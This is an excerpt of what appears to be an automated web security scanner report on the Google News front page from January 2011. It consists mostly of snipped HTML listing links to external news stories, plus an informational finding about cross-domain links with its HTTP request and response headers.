<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376161,00.asp" target="_blank" class="usg-AFQjCNGKiHjC_kakoEG8A44FhwtCe2AHAg " id="MAA4AEgUUAFgAmoCdXM">Reports: Motorola Xoom to Cost About the Same as 32GB iPad</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcworld.com/businesscenter/article/217509/motorola_xoom_tablets_price_will_shoot_it_in_the_foot.html" target="_blank" class="usg-AFQjCNELXhCiOQGRPhUbTNbYaBMofmmhCA " id="MAA4AEgUUAJgAmoCdXM">Motorola Xoom Tablet&#39;s Price Will Shoot It in the Foot</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHYFaiEpBfJtoQNCxiTBsYvMlBrJg " href="http://news.cnet.com/8301-17852_3-20029268-71.html" id="MAA4AEgUUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH8bZiGGhCNt2S7b-uGLUlcP2m-Bw " href="http://arstechnica.com/gadgets/news/2011/01/report-motorola-xoom-to-launch-february-17-for-around-700.ars" id="MAA4AEgUUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGqPg2wGubRAMYVqwEuEZMwagOScw " href="http://voices.washingtonpost.com/fasterforward/2011/01/reports_xoom_release_date_is_f.html" id="MAA4AEgUUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF67MVvZezEMdstKe1ABRVW1iIdfw " href="http://www.msnbc.msn.com/id/41220540/ns/business-motley_fool/" id="MAA4AEgUUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://abcnews.go.com/US/wireStory?id=12742296" class="usg-AFQjCNGaSXymdf0g6zpz8vX8gCPsRxZeLg " title="ABC News"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/4qo0wQiEBATaaM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://abcnews.go.com/US/wireStory?id=12742296" class="usg-AFQjCNGaSXymdf0g6zpz8vX8gCPsRxZeLg "> ABC News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHD9gmMcX5UbuSNEialO4A3C839Zg " href="http://online.wsj.com/article/BT-CO-20110124-713737.html" id="MAA4AEgVUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://chicagobreakingbusiness.com/2011/01/cantor-declares-state-bankruptcy-law-doa.html" target="_blank" class="usg-AFQjCNGdoU1Lh67pcIeV49PyT7DoCZ4pRg " id="MAA4AEgVUAJgAmoCdXM">Cantor declares state bankruptcy law DOA</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFsJ-xmO_ejoSJAqbQS-S39fJbZpg " href="http://www.reuters.com/article/idUSN2419775920110124" id="MAA4AEgVUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGhzLhkbOVz53QHJ6bmW7YycCP-lA " href="http://latimesblogs.latimes.com/money_co/2011/01/eric-cantor-states-bankruptcy-bailouts-house-majority-leader-gingrich.html" id="MAA4AEgVUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYGF2tFrtqpMAo1sUiv4XCv4MgNA " href="http://tpmdc.talkingpointsmemo.com/2011/01/republicans-in-a-fix-on-infrastructure-spending.php" id="MAA4AEgVUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHVSFWw5bW8lOlkPcETmuGH7fJddA " href="http://voices.washingtonpost.com/44/2011/01/eric-cantor-president-obama-wa.html" id="MAA4AEgVUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.news.com.au/technology/apple-customer-who-downloaded-10-billionth-app-thought-prize-call-was-a-prank/story-e6frfro0-1225993161399" class="usg-AFQjCNGMNFBPkmb3N6kQ2UbPMuDb7y51TQ " title="NEWS.com.au"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/Fhq9dR-iZ4nTxM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.news.com.au/technology/apple-customer-who-downloaded-10-billionth-app-thought-prize-call-was-a-prank/story-e6frfro0-1225993161399" class="usg-AFQjCNGMNFBPkmb3N6kQ2UbPMuDb7y51TQ "> NEWS.com.au </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNE4NKmZ-bO-krcRyPLnbE7HadO1ng " href="http://technolog.msnbc.msn.com/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up" id="MAA4AEgWUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://news.cnet.com/8301-17852_3-20029276-71.html" target="_blank" class="usg-AFQjCNG8H2VktqAMsHReFNwIgHjafJM5Wg " id="MAA4AEgWUAFgAmoCdXM">Woman hangs up on $10000 call from Apple</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.informationweek.com/news/hardware/handheld/showArticle.jhtml?articleID=229100083&amp;cid=RSSfeed_IWK_News" target="_blank" class="usg-AFQjCNEmx71C1yiEGag4s2BvqaGBYMUQ3w " id="MAA4AEgWUAJgAmoCdXM">What&#39;s Driving Apple&#39;s 10 Billion App Success</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGzIPukqq0qd92l2yykeeaIvVTHug " href="http://www.bbc.co.uk/go/rss/int/news/-/newsbeat/12266806" id="MAA4AEgWUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHoi6Iy8xphSHe0HBflKtTqu4IJtg " href="http://www.computerworld.com/s/article/354343/Enterprise_App_Stores_A_Good_Idea_" id="MAA4AEgWUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF6mG8lO_xIkXBXafvs1y3RZLLzbw " href="http://www.theregister.co.uk/2011/01/24/apple_10_billionth_customer_prank_call/" id="MAA4AEgWUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHA_tLIFDLaaQzm18hZa38fC_CNWw " href="http://techland.time.com/2011/01/24/winner-of-apples-10-billionth-app-download-promo-hangs-up-on-company/" id="MAA4AEgWUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHiERdzKjGz_owcJAKwYgaq2jAmhQ " href="http://www.cnn.com/2011/WORLD/africa/01/24/winds.change/?hpt=C1" id="-9130425399277123681"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUIAy8iUF8AYKI9an-TtV9uy8Ftw " href="http://www.foxnews.com/world/2011/01/24/ap-interview-iaea-critical-irans-cooperation/" id="415738970037031730"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHBvFgzzTzx9w0WGdmzzseti6ngaQ " href="http://www.reuters.com/article/idUSTRE70N6U520110124" id="1857102735582363016"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEK2ud_k0F8qRyqgsh-kAYgITivyQ " href="http://voices.washingtonpost.com/capitalsinsider/matt-hendricks/video-matt-hendricks-answers-y.html" id="MAE4AEgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEYW-eOsdylgGuCJv1odl_DRoolHg " href="http://voices.washingtonpost.com/dr-gridlock/2011/01/bill_would_allow_mcdonnell_to.html" id="MAE4AEgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNE64Ep_yxeXZUqNQV9MB1-njgF7pQ " href="http://voices.washingtonpost.com/capitalsinsider/new-york-rangers/capitals-seek-more-than-redemp.html" id="MAE4AEgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHhWLxBM_njab00Iw569pvgKUJAJw " href="http://www.newsweek.com/blogs/the-gaggle/2011/01/24/why-no-one-will-watch-the-state-of-the-union.html" id="MAE4AUgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUVFbVVUXTIHlz-l1C5dBB5sKdxg " href="http://www.latimes.com/news/local/la-me-mega-storm-20110123,0,1868244.story" id="MAE4AUgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNH8qeVdzvBEnfzEKH7vE3_vwVQTqg " href="http://www.naturalnews.com/031076_USDA_bird_deaths.html" id="MAE4AUgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNF2Ndq7u1NFQAEeGnztrLOHGBXwVA " href="http://online.wsj.com/article/SB10001424052748703954004576090020541379588.html" id="MAE4AUgDUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGblh1wTgbZsSv-VYZXiNbBHiKNXw " href="http://news.nationalgeographic.com/news/2011/01/110119-yellowstone-park-supervolcano-eruption-magma-science/" id="MAE4AUgEUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHyWl3EN4CNcBZDRvx0uWAGqRTn-w " href="http://www.bbc.co.uk/news/uk-12225163" id="MAE4AUgFUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGGQHDo9ynACtTjJAIzBv77Y3Il_g " href="http://www.latimes.com/news/local/la-me-surfer-mavericks-20110124,0,4017331.story" id="MAE4AUgGUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNH3leUf1fO6O5B9hqaX2KdznCt2KA " href="http://www.wired.com/epicenter/2011/01/times-paywall/" id="MAE4AUgHUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEdtmVNLHhQzK5b8i2ymGRHBdQgJw " href="http://www.nytimes.com/2011/01/23/books/review/Paul-t.html" id="MAE4AUgIUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFqlgKE7z1GSfD-_OAHlbbllpcUzA " href="http://online.wsj.com/article/SB10001424052748703951704576092371207903438.html" id="MAE4AUgJUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNF-_hi1BV8k2Oo3VN4qgrAvppO1bQ " href="http://www.wired.com/gadgetlab/2011/01/windows-phone-7-jailbreakers/" id="MAE4AUgKUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHvSlpbZ6Gr6O9Sj5zjv2qb4n4b4g " href="http://www.latimes.com/news/opinion/commentary/la-oe-rodriguez-20110124,0,5860440.column" id="MAE4AUgLUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/QMHmzs0RsUA/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/QMHmzs0RsUA/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=QMHmzs0RsUA">NBA TV Top 5: January 23rd</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=QMHmzs0RsUA">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Ay5CfV-_438/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Ay5CfV-_438/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=Ay5CfV-_438">Sport Science: Devin Hester Vs. A Black Bear</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=Ay5CfV-_438">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/THO8bb8v_Xs/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/THO8bb8v_Xs/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=THO8bb8v_Xs">Bomb Attacks Kill 10 in Iraq Capital</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=THO8bb8v_Xs">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/uwXNpYAgahg/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/uwXNpYAgahg/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=uwXNpYAgahg">Fitness Guru Jack LaLanne Dead at 96</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=uwXNpYAgahg">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/_XOgAa7BN-o/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/_XOgAa7BN-o/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=_XOgAa7BN-o">Packers Top Bears, Earn Super Bowl Berth</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=_XOgAa7BN-o">Watch video</a>
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGabipshqDpEThvts4Js4ElbcfX_A " href="http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/" id="8662120574501095458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGQCd1rS9GL5PNAUudI5RpsxmOAbQ " href="http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/" id="-7783858872244448158"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHH_B8Vhlsac2V2jAPJyKDuyVeAAA " href="http://mashable.com/2011/01/24/engaging-facebook-fans/" id="-7258938783345423075"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNH2LifoZ2DaEkfGjsc9kMMPnJB2kg " href="http://www.cbsnews.com/stories/2011/01/24/ap/strange/main7278196.shtml" id="-7252428281190763667"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEPdEfqF2nkQ1qDcAFFpZusUDt9tA " href="http://www.reuters.com/article/idUSTRE70N2TQ20110124" id="5335316056229417362"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNENgV2GEqlhUgEGu5EME68UcyGRvw " href="http://www.theatlantic.com/technology/archive/2011/01/the-inside-story-of-how-facebook-responded-to-tunisian-hacks/70044/" id="-6685976054251165433"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNE9LKKsqu443-DV8lm4q72snzhdWw " href="http://www.nytimes.com/2011/01/24/technology/24cook.html" id="3851731467917620472"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNF0sJpX5iFReuTSkI-eJ2x5QatHcA " href="http://www.nytimes.com/2011/01/24/business/24fees.html?src=busln" id="-6745807016666702947"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFu_9RyhYijNKzwJqwfe2g-y3O7vA " href="http://www.chicagotribune.com/news/local/breaking/chibrknews-court-rules-against-emanuel-on-01242011,0,4083659.story" id="6711712754283306360"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHT_jvJT_yNF5cx8BE3V88ObIMsfQ " href="http://online.wsj.com/article/SB10001424052748704881304576094000352599050.html" id="3419897226598733059"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHe-laFgexyFrmfE7lXlS-da3UXCA " href="http://mashable.com/2011/01/20/google-offers/" id="-2235673424111835580"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEsz7_xejPP6VsD3NuWdHvxda40Kg " href="http://www.huffingtonpost.com/2011/01/20/two-suns-twin-stars_n_811864.html" id="1375770744202528156"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGabipshqDpEThvts4Js4ElbcfX_A " href="http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/" id="8662120574501095458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGLZSeleCrQ4gBas6xZiwZUPYDCYQ " href="http://www.huffingtonpost.com/2011/01/17/starbucks-new-size-trenta-graphic_n_810083.html" id="-6583013401083455589"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEIKm4Fup2J5xjAnEf8e9q0nfSP0Q " href="http://www.nytimes.com/2011/01/18/opinion/18brooks.html" id="5024855345474111787"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGQCd1rS9GL5PNAUudI5RpsxmOAbQ " href="http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/" id="-7783858872244448158"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEIqQNaGnqPT81jx2kLrr0Da_XsHg " href="http://www.nytimes.com/2011/01/20/business/20walmart.html?src=busln" id="6107526647097459892"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEQX0__xR6F03eNBD80wQ9ztviVrQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html" id="6905605053023830163"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHmXxgsr2Peqa9XqIE5wJgWC0cf0w " href="http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162" id="-8119849514259291457"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGpLGEB4oQts2tE3LiQynQ3Z-K5RQ " href="http://www.cnngo.com/explorations/life/12-coolest-nationalities-earth-050844" id="7279004896616451596"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNE6ybBw84x9uoypftV5tngJHzOltg " href="http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/" id="6382990014983290027"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNG6VFJsd5LghOJQDRVmX0-Z39bpvg " href="http://mashable.com/2011/01/12/obsessed-with-facebook-infographic/" id="-5027991129252007488"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGefgxSphxOT7DWIJfYen2FHqVKeA " href="http://www.huffingtonpost.com/2011/01/13/new-zodiac-sign-dates-oph_n_808567.html" id="2526493708698605676"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGguw_7ImLDpzcb2GdQY0b690KAjA " href="http://online.wsj.com/article/SB10001424052748704111504576059713528698754.html" id="6034302388163933602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNG31ieJjehuVhbmm8A6VoEwB34ufg " href="http://news.blogs.cnn.com/2011/01/13/no-your-zodiac-sign-hasnt-changed/" id="-5002562622630809801"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEBCqmXL7Go4fAtoGveE-Ftib_JTA " href="http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html" id="5830623823895293286"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHctKe5Y-WBhY6hGZFBttgAQRB3-Q " href="http://news.blogs.cnn.com/2011/01/11/snow-present-in-49-of-the-50-u-s-states/" id="1409758142476247527"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEkadxsOjF3ACMoM7ayuBEhtjIiRw " href="http://www.wired.com/threatlevel/2011/01/twitter/" id="-198025857784313602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFyXWaX3UnCdLqv5YPYdbvsndnWkg " href="http://www.guardian.co.uk/media/2011/jan/08/us-twitter-hand-icelandic-wikileaks-messages" id="-2612389445387481788"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEK4OuQ5vLuSdUivCvstxdy78zHhA " href="http://www.slate.com/id/2281146/" id="-303322691301458140"><span class="titletext">
...[SNIP]...
<div class="goog-menuitem" id="s-email"><img class="icon email-icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="15" height="15" alt="Share story by email"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-reader-titleurl" value="url"><img class="share-icon-reader icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Google Reader Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-fb-titleurl" value="u"><img class="share-icon-facebook icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Facebook Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-twitter-shareurl" value="http://twitter.com/home"><img class="share-icon-twitter icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Twitter Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-buzz-titleurl" value="url"><img class="icon share-icon-buzz" src="http://www.gstatic.com/news/img/cleardot.gif" alt="Buzz this story"><span class="sharing-link">
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

20.109. http://news.google.com/nwshp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /nwshp

Issue detail

The page was loaded from a URL containing a query string:
  • http://news.google.com/nwshp?hl=en&tab=wn
The response contains the following links to other domains:

Request

GET /nwshp?hl=en&tab=wn HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=slGqRfC6ICTOdMJSwSFNt4jQCJaOi3R3pO1ScXdLgDi96Ki8QeVRuripgNFojNaoZJGR_YDCKit2vQhsNByxl3kULLF1ej8slk28PVNOZNkZz8MkBiOgS5YGoJNCtar1;Domain=.google.com;Path=/;Expires=Wed, 27-Jul-2011 14:25:24 GMT;HttpOnly
Date: Tue, 25 Jan 2011 14:25:24 GMT
Expires: Tue, 25 Jan 2011 14:25:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;topic=h&amp;num=3&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<span class="sel"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ss&amp;ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=w&amp;ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;geo=detect_metro_area&amp;ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=n&amp;ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=b&amp;ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=t&amp;ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=e&amp;ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=s&amp;ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=m&amp;ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ir&amp;ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<div id="rhc-toggler" class="rhc-toggler"><img id="rhc-toggler-image" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="icon rhc-toggler-icon expanded"></div>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110123/obama-state-union-110123/" class="usg-AFQjCNH02kUfthKCE92PXDBgC02gic3LZg " title="CTV.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/l2LZVd_dX5rO8M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110123/obama-state-union-110123/" class="usg-AFQjCNH02kUfthKCE92PXDBgC02gic3LZg "> CTV.ca </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNE7Vwk-Qa_sZ9z72Cn2EtSMJI2j4A " href="http://www.reuters.com/article/idUSN2525117520110125" id="MAA4AEgAUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=pUzMhGLMFgQ">Video:&nbsp;
Obama to Focus on Economy in Tuesday Address
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.cbsnews.com/stories/2011/01/25/politics/main7280843.shtml" target="_blank" class="usg-AFQjCNHHtSqbZ3-3cRPJEgu_uvDA0zfmGg " id="MAA4AEgAUAFgAmoCdXM">Obama to Seek Balance before Divided Congress</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFd3L_NczRkYYaSyi6l4TDxyz_MPQ " href="http://www.npr.org/2011/01/25/133204546/the-root-why-obamas-speech-needs-to-play-it-safe" id="MAA4AEgAUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
